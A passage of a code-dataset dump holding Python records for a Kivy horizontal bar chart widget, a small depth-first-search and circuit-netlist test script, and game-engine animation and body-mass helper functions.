kwargs or 'init' in kwargs and not kwargs['init']:\n self.clear_widgets()\n self.canvas.clear()\n\n if 'values' in kwargs:\n self.values = kwargs.pop('values')\n if 'labels' in kwargs:\n self.labels = kwargs.pop('labels')\n if 'hints' in kwargs:\n self.hints = kwargs.pop('hints')\n if 'h_axis_height_factor' in kwargs:\n self.units_area_factors = kwargs.pop('h_axis_height_factor')\n if 'legend_area_height' in kwargs:\n self.legend_area_height = kwargs.pop('legend_area_height')\n if 'title_area_height' in kwargs:\n self.title_area_height = kwargs.pop('title_area_height')\n if 'unit' in kwargs:\n self.unit = kwargs.pop('unit')\n if 'slices' in kwargs:\n self.slices = kwargs.pop('slices')\n if 'time' in kwargs:\n self.time = kwargs.pop('time')\n if 'lang_dict' in kwargs:\n self.lang_dict = kwargs.pop('lang_dict')\n if 'legend' in kwargs:\n self.legend = kwargs.pop('legend')\n if 'title' in kwargs:\n self.title = kwargs.pop('title')\n if 'min_font' in kwargs:\n self.min_font_size = kwargs.pop('min_font')\n if 'pareto' in kwargs:\n self.pareto = kwargs.pop('pareto')\n\n self._hbarchart()\n\n def _hbarchart(self):\n # General actions\n self._prepare_data()\n self._get_parameters()\n\n if self.parent:\n # Draw chart\n self._draw_background()\n self._draw_grid()\n self._draw_record_labels()\n self._draw_rectangles()\n self._draw_legend()\n self._draw_title()\n\n def _get_parameters(self):\n # Calculate chart cords\n self.cords = {}\n self.cords['x'] = self.pos[0] + self.hints['left'] * self.size[0]\n self.cords['y'] = self.pos[1] + self.hints['bottom'] * self.size[1]\n self.cords['x2'] = self.pos[0] + \\\n self.size[0] * (1 - self.hints['right'])\n self.cords['y2'] = self.pos[1] + self.size[1] * (1 - self.hints['top'])\n\n # Calculate spaces\n self.middle_space = self.size[0] * self.mid_space_factor\n self.axis_labels_space = self.size[1] * self.h_axis_height_factor\n self.top_extra_hints = 0\n\n if len(self.legend) > 0:\n self.top_extra_hints += self.legend_area_height * self.size[1]\n if len(self.title) > 0:\n self.top_extra_hints += self.title_area_height * self.size[1]\n\n self.drawing_height = self.cords['y2'] - self.cords['y'] \\\n - self.axis_labels_space - self.top_extra_hints\n\n # Calculate records height\n number_of_records = max(len(self.labels), len(self.values))\n\n if number_of_records is 1:\n self.record_height = 0.25 * self.drawing_height\n else:\n self.record_height = self.drawing_height / number_of_records\n self.rect_height = self.record_height * 0.75\n\n # Calculate minimal widget size\n self.minimal_height = max(\n self.min_font_size * number_of_records * 1.35,\n 300)\n\n self.minimal_width = max(\n self.min_font_size * self.font_width_ratio\n * self.max_label_lenght * 1.85, 100)\n\n # Calculate input font parameters\n self.records_font_size = min(\n self.size[1] * 0.1, self.record_height - 1)\n if len(self.labels) is 0:\n self.greatest_char_count = 0\n else:\n self.greatest_char_count = max(\n [len(label) for label in self.labels])\n self.max_label_width = 0.5 * self.size[0]\n\n # Calculate font size\n for i in range(int(self.records_font_size)):\n actual_label_width = self.font_width_ratio * self.records_font_size \\\n * self.greatest_char_count\n if actual_label_width <= self.max_label_width:\n break\n else:\n self.records_font_size -= i\n\n # Calculate labels width\n self.labels_width = self.font_width_ratio * \\\n self.records_font_size * self.greatest_char_count\n\n # General font size\n approximate_unit_area_width = max(\n 0.05 * self.size[0],\n 3 * self.min_font_size * 
self.font_width_ratio)\n drawing_width = self.cords['x2'] + approximate_unit_area_width \\\n - self.cords['x'] - self.labels_width - self.middle_space\n self.general_font_size = max(\n min(drawing_width * 0.03, self.drawing_height * 0.02),\n self.min_font_size)\n\n # Unit area width\n self.unit_with_brackets = '[{}]'.format(self.unit)\n self.unit_area_width = len(\n self.unit_with_brackets) * self.general_font_size\n\n # Calculate drawing cords\n self.drawing_cords = {}\n self.drawing_cords['x'] = self.cords['x'] + self.labels_width \\\n + self.middle_space\n self.drawing_cords['y'] = self.cords['y'] + self.axis_labels_space\n self.drawing_cords['x2'] = self.cords['x2'] - self.unit_area_width\n self.drawing_cords['y2'] = self.cords['y2'] - self.top_extra_hints\n\n # Other calculations\n self.general_labels_height = self.general_font_size + 1\n self.pixels_per_character = self.general_font_size * self.font_width_ratio\n\n def _prepare_data(self):\n # Convert labels to string and trim too long ones\n for i, label in enumerate(self.labels):\n self.labels[i] = str(self.labels[i])\n if len(label) > self.max_label_lenght:\n self.labels[i] = self.labels[i][:self.max_label_lenght - 3] + '...'\n\n if not self.time:\n\n if type(self.values[0]) is list:\n for i, row in enumerate(self.values):\n for j, value in enumerate(row):\n self.values[i][j] = float(value)\n else:\n for i, value in enumerate(self.values):\n self.values[i] = float(value)\n\n def _draw_record_labels(self):\n # Draw record labels\n x_start = self.pos[0] + self.hints['left'] * self.size[0]\n rectangle_labels = Widget()\n for i in range(len(self.labels)):\n label = Label(text=self.labels[i],\n pos=(x_start,\n self.drawing_cords['y'] + self.record_height * i),\n size=(self.labels_width, self.rect_height),\n halign='right',\n valign='middle',\n font_size='{}sp'.format(self.records_font_size),\n font_name=self.font_name,\n text_size=(self.labels_width, self.record_height),\n color=self.contour_color)\n rectangle_labels.add_widget(label)\n self.add_widget(rectangle_labels)\n\n def _draw_rectangles(self):\n # Draw rectangles\n with self.canvas:\n value_list_lenght = len(self.values)\n\n # Detect value of longest bar\n max_value = 0\n bar_values = []\n for i in range(value_list_lenght):\n if type(self.values[i]) is list:\n bar_value = sum(self.values[i])\n else:\n bar_value = self.values[i]\n if bar_value > max_value:\n max_value = bar_value\n bar_values.append(bar_value)\n\n # Iterate by record\n aggregated_column_share = 0\n sum_of_values = sum(bar_values)\n for i in range(value_list_lenght):\n # Calculate bar width\n max_rect_width = \\\n self.drawing_cords['x2'] - self.drawing_cords['x']\n if max_value > 0:\n bar_width = max_rect_width * bar_values[i] / max_value\n else:\n bar_width = 0\n\n if type(self.values[i]) is list:\n no_of_slices = len(self.values[i])\n else:\n if max_value > 0:\n percentage_column_share = bar_values[i] / sum_of_values\n aggregated_column_share += percentage_column_share\n else:\n percentage_column_share = 0\n\n no_of_slices = 1\n\n if self.pareto:\n if aggregated_column_share <= self.pareto_limits[0]:\n add = self.pareto_color_ads[0]\n elif aggregated_column_share <= self.pareto_limits[1]:\n add = self.pareto_color_ads[1]\n elif aggregated_column_share > self.pareto_limits[1]:\n add = self.pareto_color_ads[2]\n else:\n add = 0.5\n\n # Color\n color = rgb_to_hsv(*self.one_color[0])\n Color(color[0],\n (0.5 + add),\n color[2],\n mode='hsv')\n\n # Iterate by slice\n done_width = 0\n slice_width = bar_width\n for j 
in range(no_of_slices):\n                if no_of_slices > 1:\n                    if bar_values[i] > 0:\n                        slice_width = self.values[i][j] / \\\n                            bar_values[i] * bar_width\n                    else:\n                        slice_width = 0\n\n                # Color\n                if no_of_slices == 2:\n                    if j == 0:\n                        Color(*self.stacked_colors[0])\n                    else:\n                        Color(*self.stacked_colors[2])\n                else:\n                    Color(*self.stacked_colors[j % 5])\n\n                Rectangle(pos=(self.drawing_cords['x'] + done_width,\n                               self.drawing_cords['y'] + self.record_height * i),\n                          size=(slice_width, self.rect_height))\n\n                done_width += slice_width\n\n    def _draw_background(self):\n        # Draw background color\n        if self.black:\n            self.background_color = [0, 0, 0, 1]\n            self.contour_color = [1, 1, 1, 1]\n        else:\n            self.background_color = [1, 1, 1, 1]\n            self.contour_color = [0, 0, 0, 1]\n        with self.canvas:\n            Color(*self.background_color)\n            Rectangle(size=self.size, pos=self.pos)\n\n    def _draw_grid(self):\n        # Draw grid\n        if self.grid and self.grid_widget not in self.children:\n            self.grid_widget = Widget()\n            chart_width = self.drawing_cords['x2'] - self.drawing_cords['x']\n\n            # Add markers\n            with self.grid_widget.canvas:\n                Color(*self.contour_color)\n                # Add horizontal axis\n                Line(bezier=(self.drawing_cords['x'], self.drawing_cords['y'],\n                             self.drawing_cords['x2'], self.drawing_cords['y']))\n                # Add frame\n                Line(points=(self.drawing_cords['x'], self.drawing_cords['y'],\n                             self.drawing_cords['x'], self.drawing_cords['y2'],\n                             self.drawing_cords['x2'], self.drawing_cords['y2'],\n                             self.drawing_cords['x2'], self.drawing_cords['y']))\n\n                # Add vertical lines\n                for i in range(self.slices + 1):\n                    increment = chart_width / self.slices * i\n                    Line(points=(\n                        self.drawing_cords['x'] + increment, self.drawing_cords['y'] -\n                        self.drawing_height * 0.01,\n                        self.drawing_cords['x'] + increment, self.drawing_cords['y2']))\n\n            # Add grid values\n\n            axis_tick_label_pixels = []\n            axis_tick_labels = []\n\n            if isinstance(self.values[0], list):\n                max_val = max([sum(instance) for instance in self.values])\n            else:\n                max_val = max(self.values)\n\n            # Calculate tick label value with correct precision\n            counter = 0\n            label_values = []\n            precision = 0\n            while counter <= self.slices:\n                if precision == 0:\n                    label_value = round(max_val / self.slices * counter)\n                else:\n                    label_value = round(\n                        max_val / self.slices * counter, precision)\n                if max_val > 0:\n                    if label_value in label_values:\n                        precision += 1\n                        counter = 0\n                        label_values = []\n                    else:\n                        label_values.append(label_value)\n                        counter += 1\n                else:\n                    label_values.append(label_value)\n                    counter += 1\n\n            for i in range(self.slices + 1):\n                label_value = label_values[i]\n                # If the label is a time value, translate it to a timedelta\n                if self.time:\n                    label_value = self.seconds_to_timedelta(label_value)\n\n                label_value = str(label_value)\n\n                if set(self.lang_dict.values()) != {'day', 'days'}:\n                    # Translate period names into the other language\n                    label_value = label_value.replace(\n                        'days', self.lang_dict['days'])\n                    label_value = label_value.replace(\n                        'day', self.lang_dict['day'])\n\n                axis_tick_labels.append(label_value)\n\n                # Calculate the label length in pixels and add it to the list\n                axis_tick_label_pixels.append(\n                    len(axis_tick_labels[i]) * self.pixels_per_character)\n\n            max_lab_length = max(axis_tick_label_pixels)\n            val_start_pos = (self.drawing_cords['x'],\n                             self.drawing_cords['y'] - self.drawing_height * 0.03)\n            increment = 0\n\n            # Decide whether a vertical offset is needed\n            if max_lab_length > 0.8 * chart_width / self.slices:\n                v_offset = self.general_font_size\n            else:\n                v_offset = 0\n\n            for i in range(self.slices + 1):\n                increment = chart_width / self.slices * i\n\n                label_value = Label(\n                    text='{}'.format(axis_tick_labels[i]),\n                    pos=(val_start_pos[0] + increment - axis_tick_label_pixels[i] / 2,\n                         val_start_pos[1] - (i % 2) * v_offset),\n                    size=(axis_tick_label_pixels[i],\n                          self.general_labels_height),\n                    font_size='{}sp'.format(self.general_font_size),\n                    font_name=self.font_name,\n                    text_size=(\n                        axis_tick_label_pixels[i], self.general_font_size),\n                    halign='center',\n                    valign='center',\n                    color=self.contour_color)\n                self.grid_widget.add_widget(label_value)\n\n            # Add unit\n            if not v_offset or (self.slices + 1) % 2:\n                unit_v_offset = self.general_font_size\n            else:\n                unit_v_offset = 0\n\n            unit_pos = (self.drawing_cords['x2'] + self.unit_area_width / 2,\n                        val_start_pos[1] - unit_v_offset)\n            unit_label = Label(text=self.unit_with_brackets,\n                               pos=unit_pos,\n                               size=(self.unit_area_width,\n                                     self.general_labels_height),\n                               halign='center',\n                               valign='center',\n                               font_size='{}sp'.format(self.general_font_size),\n                               font_name=self.font_name,\n                               text_size=(self.unit_area_width,\n                                          self.general_labels_height),\n                               color=self.contour_color)\n            self.grid_widget.add_widget(unit_label)\n\n            self.add_widget(self.grid_widget)\n\n    def _draw_legend(self):\n        if len(self.legend) > 0:\n            self.legend_widget = Widget()\n\n            if len(self.legend) == 1:\n                colors = list(self.one_color)\n            else:\n                colors = list(self.stacked_colors)\n\n            for i in range(len(colors)):\n                colors[i] = rgb_to_hsv(*colors[i])\n\n            new_legend = []\n            new_colors = []\n            if self.pareto and len(self.legend) == 1:\n\n                for i in range(3):\n                    new_legend.append(\n                        '{} {}'.format(self.legend[0], self.pareto_labels[i]))\n                    new_colors.append((colors[0][0], 0.5 + self.pareto_color_ads[i],\n                                       colors[0][2]))\n            else:\n                new_legend = self.legend\n                new_colors = colors\n\n            chart_width = self.drawing_cords['x2'] - self.drawing_cords['x']\n            legend_level = self.drawing_cords['y2'] + 0.01 * self.size[1]\n            one_character_width = self.general_font_size * self.font_width_ratio\n            legend_length = len(new_legend)\n            after_label_offset = chart_width * 0.015\n            before_label_offset = one_character_width\n            max_stripe_length = 0.1 * chart_width\n            center = self.drawing_cords['x'] + chart_width / 2\n\n            all_after_offset = (legend_length - 1) * after_label_offset\n            all_before_offset = legend_length * before_label_offset\n            all_offset = all_after_offset + all_before_offset\n\n            label_widths = []\n            total_labels_width = 0\n            for i in range(legend_length):\n                width = one_character_width * len(new_legend[i])\n                label_widths.append(width)\n                total_labels_width += width\n\n            space_for_stripes = chart_width - total_labels_width - all_offset\n\n            space_for_one_stripe = space_for_stripes / legend_length\n            if space_for_one_stripe > max_stripe_length:\n                space_for_one_stripe = max_stripe_length\n\n            space_for_stripes = space_for_one_stripe * legend_length\n            stripes_and_labels = space_for_stripes + total_labels_width\n\n            centered_start_pos = center - (stripes_and_labels + all_offset) / 2\n\n            with self.legend_widget.canvas:\n                current_offset = 0\n                for i in range(legend_length):\n                    ii = i % 5\n                    Color(*new_colors[ii], mode='hsv')\n                    Rectangle(pos=(centered_start_pos + current_offset,\n                                   legend_level),\n                              size=(space_for_one_stripe, self.general_labels_height))\n\n                    self.legend_widget.add_widget(\n                        Label(text=new_legend[i],\n                              pos=(centered_start_pos + current_offset\n                                   + space_for_one_stripe + one_character_width,\n                                   legend_level),\n                              size=(label_widths[i],\n                                    self.general_labels_height),\n                              font_name=self.font_name,\n                              font_size='{}sp'.format(self.general_font_size),\n                              color=self.contour_color))\n\n                    current_offset += space_for_one_stripe + label_widths[i] \\\n                        + after_label_offset + before_label_offset\n\n            self.add_widget(self.legend_widget)\n\n    def _draw_title(self):\n        title_length = len(self.title)\n\n        if title_length:\n            if len(self.legend):\n                y = self.drawing_cords['y2'] + \\\n                    self.legend_area_height * self.size[1]\n            else:\n                y = self.drawing_cords['y2']\n\n            title_width = self.drawing_cords['x2'] - self.drawing_cords['x']\n\n            title_height = self.font_width_ratio * self.records_font_size\n            self.title_font_size = self.general_font_size * 1.5\n            self.title_labels_height = self.title_font_size + 1\n\n            self.one_character_width = self.font_width_ratio * self.title_font_size\n            max_title_length = round(\n                title_width / self.one_character_width) - 3\n\n            if title_length > max_title_length:\n                title = self.title[:(max_title_length + 1)] + '...'\n            else:\n                title = self.title\n\n            title = Label(text=title,\n                          pos=(self.drawing_cords['x'], y),\n                          size=(title_width, self.title_labels_height),\n                          font_size=self.title_font_size,\n                          font_name=self.font_name,\n                          color=self.contour_color)\n\n            self.add_widget(title)\n\n    def toggle_grid(self, *args):\n        if not self.grid and self.grid_widget in self.children:\n            self.remove_widget(self.grid_widget)\n        elif self.grid and self.grid_widget not in self.children:\n            self.grid_widget = None\n            self._draw_grid()\n            overdraw_limit = 5\n            if self.grid_counter < overdraw_limit:\n                self._draw_rectangles()\n                self.grid_counter += 1\n            else:\n                self.new()\n                self.grid_counter = 0\n\n    def toggle_colors(self, *args):\n        # Draw chart\n        self.clear_widgets()\n        self.canvas.clear()\n        self._draw_background()\n        self._draw_grid()\n        self._draw_record_labels()\n        self._draw_rectangles()\n        self._draw_legend()\n        self._draw_title()\n\n    # Auxiliary methods\n\n    @staticmethod\n    def seconds_to_timedelta(seconds):\n        '''Convert seconds (int or float) into a timedelta object'''\n        timedelta_object = timedelta(seconds=seconds)\n        return timedelta_object\n\n\nclass Hbarchart_With_Scroll(ScrollView):\n\n    def __init__(self, *args, **kwargs):\n        '''\n        values = ['0'] (or values = [[], [], ..., []]), labels = ['label'],\n        hints = {'left': 0.01, 'right': 0.02, 'bottom': 0.01, 'top': 0.01}\n        mid_space_factor = 0.01, h_axis_height_factor = 0.05,\n        legend_area_height = 0.05, title_area_height = 0.05, unit = '-', \n        slices = 11, time = False, lang_dict = {'day': 'day', 'days': 'days'}, \n        legend = []\n        '''\n        super(Hbarchart_With_Scroll, self).__init__()\n        self.bind(size=self.resize)\n        self.new(**kwargs)\n\n    def new(self, *args, **kwargs):\n        '''\n        values = ['0'] (or values = [[], [], ..., []]), labels = ['label'],\n        hints = {'left': 0.01, 'right': 0.02, 'bottom': 0.01, 'top': 0.01}\n        mid_space_factor = 0.01, h_axis_height_factor = 0.05,\n        legend_area_height = 0.05, title_area_height = 0.05, unit = '-', \n        slices = 11, time = False, lang_dict = {'day': 'day', 'days': 'days'}, \n        legend = []\n        '''\n\n        if len(self.children) > 0:\n            self.chart.new(**kwargs, min_font=self.get_min_font())\n            self.box.clear_widgets()\n            self.box.size = (self.get_chart_width(), self.get_chart_height())\n            self.box.add_widget(self.chart)\n        else:\n            self.chart = Hbarchart(**kwargs, min_font=self.get_min_font())\n            self.box = BoxLayout(size_hint_y=None,\n                                 size_hint_x=None,\n                                 height=self.get_chart_height(),\n                                 width=self.get_chart_width())\n            self.box.add_widget(self.chart)\n            self.add_widget(self.box)\n\n    def resize(self, *args):\n        # Resize only when the current dimensions are wrong\n\n        correct_height = self.get_chart_height()\n        if self.box.height != correct_height:\n            self.box.height = correct_height\n\n        correct_width = self.get_chart_width()\n        if self.box.width != correct_width:\n            self.box.width = correct_width\n\n        self.scroll_wheel_distance = 0.15 * self.box.height\n\n    def get_min_font(self):\n        min_font = int(self.size[1] * 0.013)\n        if min_font < 10:\n            min_font = 10\n        return min_font\n\n    def get_chart_height(self):\n        return max(self.size[1], self.chart.minimal_height)\n\n    def get_chart_width(self):\n        return max(self.size[0], self.chart.minimal_width)\n\n","sub_path":"libs/kv_chart.py","file_name":"kv_chart.py","file_ext":"py","file_size_in_byte":27373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
+{"seq_id":"562629748","text":"def dfs_iterative(graph, start):\r\n    stack, path = [start], []\r\n\r\n    while stack:\r\n        vertex = stack.pop()\r\n        if vertex in path:\r\n            continue\r\n        path.append(vertex)\r\n        for neighbor in graph[vertex]:\r\n            stack.append(neighbor)\r\n\r\n    return path\r\n\r\n\r\nadjacency_matrix = {'A': ['B', 'C'], 'B': ['D', 'E'],\r\n                    'C': ['E'], 'D': ['F'], 'E': ['F'],\r\n                    'F': ['G'], 'G': []}\r\n\r\nprint(dfs_iterative(adjacency_matrix, 'A'))\r\n\r\n\r\ndef countpath(self, x, neighbors):\r\n    temp1 = []\r\n    temp2 = []\r\n    counter = 0\r\n    self.pathses[counter].append(x)\r\n    l = len(neighbors)\r\n    if l == 1:\r\n        counter = counter + 1\r\n    elif l >= 3:\r\n        while l >= 3:\r\n            l = l - 1\r\n            a = counter\r\n            while (True):\r\n                try:\r\n                    print('A ', a)\r\n                    if self.pathses[a + 2] != None and self.pathses[a + 1] != None:\r\n                        break\r\n                    temp1 = self.pathses[a].copy()\r\n                    temp2 = self.pathses[a + 1]\r\n                    a = a + 1\r\n                except(IndexError):\r\n                    self.pathses.append([])\r\n\r\n    node1=Node('FF1', 'FF', 3, 5, 1, True)\r\n    node2=Node('AND1', 'GATE', 2)\r\n    node3=Node('OR1', 'GATE', 3)\r\n    node4=Node('OR2', 'GATE', 3)\r\n    node5=Node('FF2', 'FF', 3, 5, 1)\r\n    node6=Node('FF3', 'FF', 3, 5, 1)\r\n\r\n    myCircuit=netlist()\r\n    myCircuit.add(node1, node2)\r\n    myCircuit.add(node2, node3, node4)\r\n    myCircuit.add(node3, node5)\r\n    myCircuit.add(node4, node6)\r\n    myCircuit.timingAnalyze()\r\n'''\r\n    def adj_matrix(self,inp:list):\r\n        out=[]\r\n        for x in inp:\r\n            adjacency_matrix={}\r\n            for node in self.nodes:\r\n                if node.getnodeName() in inp and node.getnodeName()!=x:\r\n                    continue\r\n                adjacency_matrix[node.getnodeName()]=list(self.g.neighbors(node.getnodeName()))\r\n                adjacency_matrix=self.delOld(adjacency_matrix,inp,node.getnodeName())\r\n            out.append(adjacency_matrix)\r\n        return out\r\n'''\r\n\r\n'''adjacency_m = {}\r\n\r\n\r\ndef matrix(self, x, inp, z):\r\n    if x in inp and x != z:\r\n        return\r\n    if x in self.adjacency_m:\r\n        return\r\n    neigh = list(self.g.neighbors(x))\r\n    self.adjacency_m[x] = neigh\r\n    for neighbors in neigh:\r\n        try:\r\n            self.adjacency_m.update(self.matrix(neighbors, inp, z))\r\n        except:\r\n            print(end='')\r\n    return self.adjacency_m\r\n\r\n\r\ndef adj_matrix(self, inp: list):\r\n    out = []\r\n    for x in inp:\r\n        self.adjacency_m.clear()\r\n        adjacency_matrix = self.matrix(x, inp, x)\r\n        adjacency_matrix = self.delOld(adjacency_matrix, inp, x)\r\n        out.append(adjacency_matrix)\r\n    return out'''","sub_path":"src/testplot.py","file_name":"testplot.py","file_ext":"py","file_size_in_byte":2800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
+{"seq_id":"37966196","text":"import random\r\nimport helpers\r\n\r\ndef runMethods(Engine,EngineModule,objects,animList,index,methodName,timePos):\r\n\tif \"groups\" in animList[index]:\r\n\t\tfor groupName in 
animList[index]['groups']:\r\n\t\t\tif groupName in objects.get():\r\n\t\t\t\tpartsList = objects.get()[groupName]\r\n\t\t\t\tfor part in partsList:\r\n\t\t\t\t\tif part:\r\n\t\t\t\t\t\tif methodName+\"-groups\" in animList[index]:\r\n\t\t\t\t\t\t\tmethods = animList[index][methodName+\"-groups\"]\r\n\t\t\t\t\t\t\tfor method in methods:\r\n\t\t\t\t\t\t\t\tmethod(Engine,EngineModule,objects,part)\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tEngine.log(\"anim runMethod:\" + str(methodName) + \": part is none: \" + str(part))\r\n\r\n\tif methodName in animList[index]:\r\n\t\tmethods = animList[index][methodName]\r\n\t\tfor method in methods:\r\n\t\t\tmethod(Engine,EngineModule,objects,timePos)\r\n\r\ndef playAnimation(Engine,EngineModule,objects,animData,animList):\r\n\tanimName = animData[\"name\"]\r\n\tstartTime = animData[\"starttime\"]\r\n\tanimIndex = animData[\"index\"]\r\n\tanimListSize = len(animList)\r\n\tcurrentTime = Engine.getTime()\r\n\tif animIndex < animListSize:\r\n\t\tendTime = startTime + animList[animIndex]['time']\r\n\t\tif ((currentTime > startTime) and\r\n\t\t\t(currentTime < endTime)):\r\n\t\t\tif animIndex != 0:\r\n\t\t\t\t#print(\"run anim end: \" + str(animName) + \" index : \" + str(animIndex-1))\r\n\t\t\t\trunMethods(Engine,EngineModule,\r\n\t\t\t\t\tobjects,animList,animIndex-1,\"end\",1.0)\r\n\t\t\telse:\r\n\t\t\t\tpass\r\n\t\t\t\t#Engine.log(\"animation start: \" + str(animName))\r\n\r\n\t\t\t#print(\"run anim start: \" + str(animName) + \" index : \" + str(animIndex))\r\n\t\t\trunMethods(Engine,EngineModule,\r\n\t\t\t\tobjects,animList,animIndex,\"start\",0.0)\r\n\t\t\tanimData[\"index\"] = animIndex + 1\r\n\t\t\t#print(\"go to next anim index\")\r\n\t\t\tanimData[\"starttime\"] = endTime\r\n\t\telif currentTime > endTime:\r\n\t\t\t#Engine.log(\"animation: currentTime is bigger then endTime\")\r\n\t\t\trunMethods(Engine,EngineModule,\r\n\t\t\t\tobjects,animList,animIndex,\"start\",0.0)\r\n\t\t\tanimData[\"index\"] = animIndex + 1\r\n\t\t\tanimData[\"starttime\"] = endTime\r\n\t\telse:\r\n\t\t\tif animIndex != 0:\r\n\t\t\t\toldIndex = animIndex - 1\r\n\t\t\t\toldTime = animList[oldIndex]['time']\r\n\t\t\t\toldEndTime = startTime\r\n\t\t\t\toldStartTime = startTime - oldTime\r\n\r\n\t\t\t\toldTimePos = float(currentTime - oldStartTime) / float(oldTime)\r\n\t\t\t\trunMethods(Engine,EngineModule,\r\n\t\t\t\t\tobjects,animList,animIndex-1,\"timePos\",oldTimePos)\r\n\r\n\r\n\telif animIndex == animListSize:\r\n\t\tif currentTime > startTime:\r\n\t\t\trunMethods(Engine,EngineModule,\r\n\t\t\t\tobjects,animList,animIndex-1,\"end\",1.0)\r\n\t\t\tanimData[\"index\"] = animIndex + 1\r\n\t\t\tanimData[\"done\"] = True\r\n\t\t\t#Engine.log(\"animation is done: \" + str(animName))\r\n\t\t\tif \"ondone\" in animData:\r\n\t\t\t\tif animData[\"ondone\"]:\r\n\t\t\t\t\tEngine.log(\"animation done: resend space release\")\r\n\t\t\t\t\tEngine.callPythonKeyReleased(EngineModule.Keys.K_SPACE)\r\n\t\telse:\r\n\t\t\toldIndex = animIndex - 1\r\n\t\t\toldTime = animList[oldIndex]['time']\r\n\t\t\toldEndTime = startTime\r\n\t\t\toldStartTime = startTime - oldTime\r\n\r\n\t\t\toldTimePos = float(currentTime - oldStartTime) / float(oldTime)\r\n\t\t\trunMethods(Engine,EngineModule,\r\n\t\t\t\tobjects,animList,animIndex-1,\"timePos\",oldTimePos)\r\n\r\n\r\n\r\n\r\ndef showBodyList(bodyList):\r\n\tnumber = 0\r\n\ttext = \"\"\r\n\tfor body in bodyList:\r\n\t\tif body:\r\n\t\t\ttext += \" \" + body.getName() + \":\"\r\n\t\t\tif body.isDynamicActor():\r\n\t\t\t\ttext += 
str(body.getMass())[:5]\r\n\r\n\t\t\tnumber += 1\r\n\tprint(text)\r\n\tprint(\"total bodies: \" + str(number))\r\n\r\ndef getBodyListFromGroupName(objects,groupName):\r\n\tif groupName in objects.get():\r\n\t\tbodyList = objects.get()[groupName]\r\n\t\treturn bodyList\r\n\telse:\r\n\t\treturn []\r\n\r\ndef getBodyListFromGroupNameList(objects,groupNameList):\r\n\tbodyList = []\r\n\tfor groupName in groupNameList:\r\n\t\tif groupName in objects.get():\r\n\t\t\tfor body in objects.get()[groupName]:\r\n\t\t\t\tbodyList.append(body)\r\n\treturn bodyList\r\n\r\ndef getBodyListFromNameList(Engine,EngineModule,nameList):\r\n\tbodyList = []\r\n\tfor bodyName in nameList:\r\n\t\tbody = helpers.getBodyFromName(Engine,EngineModule,bodyName)\r\n\t\tif body:\r\n\t\t\tbodyList.append(body)\r\n\treturn bodyList\r\n\t\t\r\n\r\ndef resetMasses(bodyList):\r\n\tfor body in bodyList:\r\n\t\tif body:\r\n\t\t\tif body.isActor():\r\n\t\t\t\tbody.resetMass()\r\n\r\ndef multiplyMasses(bodyList,factor):\r\n\tfor body in bodyList:\r\n\t\tif body:\r\n\t\t\tif body.isActor():\r\n\t\t\t\tnewMass = body.getMass() * factor\r\n\t\t\t\tbody.setMass(newMass)\r\n\r\ndef setMasses(bodyList,mass):\r\n\tfor body in bodyList:\r\n\t\tif body:\r\n\t\t\tif body.isActor():\r\n\t\t\t\tbody.setMass(mass)\r\n\r\ndef showMassRelationToPrev(bodyList):\r\n\ttext = \"\"\r\n\tfor i in range(0,len(bodyList)):\r\n\t\tbody = bodyList[i]\r\n\t\tif i > 0:\r\n\t\t\tprevBody = bodyList[i-1]\r\n\t\t\tmassRelation = body.getMass() / prevBody.getMass()\r\n\t\t\ttext += \" \" + body.getName() + \":\" + str(body.getMass())[:5]\r\n\t\t\ttext += \":\" + str(massRelation)[:5]\r\n\t\telse:\r\n\t\t\ttext += \" \" + body.getName() + \":\" + str(body.getMass())[:5]\r\n\tprint(text)\r\n\r\ndef showMassRelationToAll(bodyList):\r\n\ttotalMass = 0\r\n\ttext = \"\"\r\n\tfor body in bodyList:\r\n\t\ttotalMass += body.getMass()\r\n\tfor body in bodyList:\r\n\t\tmassRelation = body.getMass() / totalMass\r\n\t\ttext += \" \" + body.getName() + \":\" + str(body.getMass())[:5]\r\n\t\ttext += \":\" + str(massRelation)[:5]\r\n\tprint(text)\r\n\r\n\r\ndef approachRelationToPrev(bodyList,finalRelation,approachPercentage):\r\n\tfor i in range(0,len(bodyList)):\r\n\t\tbody = bodyList[i]\r\n\t\tif i > 0:\r\n\t\t\tprevBody = bodyList[i-1]\r\n\t\t\tmassInFinalRelation = prevBody.getMass() * finalRelation\r\n\t\t\tdiffToActualMass = massInFinalRelation - body.getMass()\r\n\t\t\tnewMass = body.getMass() + (diffToActualMass * approachPercentage)\r\n\t\t\tbody.setMass(newMass)\r\n\r\ndef approachEqualMassDistribution(bodyList,approachPercentage):\r\n\ttotalMass = 0\r\n\ttotalBodies = 0\r\n\tfor body in bodyList:\r\n\t\ttotalMass += body.getMass()\r\n\t\ttotalBodies += 1\r\n\tfor body in bodyList:\r\n\t\tmassInFinalRelation = totalMass / totalBodies\r\n\t\tdiffToActualMass = massInFinalRelation - body.getMass()\r\n\t\tnewMass = body.getMass() + (diffToActualMass * approachPercentage)\r\n\t\tbody.setMass(newMass)\r\n\r\ndef setTiming(Engine,EngineModule,objects,timePos,startFactor,endFactor):\r\n\ttimingDelta = endFactor - startFactor\r\n\ttiming = startFactor + (timingDelta * timePos)\r\n\tEngine.setTimingFactor(timing)\r\n\treturn True\r\n\r\ndef dissableCollisions(Engine,EngineModule,objects,bodyNames):\r\n\tfor name in bodyNames:\r\n\t\tif name in objects.get():\r\n\t\t\tbodyList = objects.get()[name]\r\n\t\t\tfor body in bodyList:\r\n\t\t\t\tif body.isActor():\r\n\t\t\t\t\tbody.dissableCollisions()\r\n\r\ndef enableCollisions(Engine,EngineModule,objects,bodyNames):\r\n\tfor name 
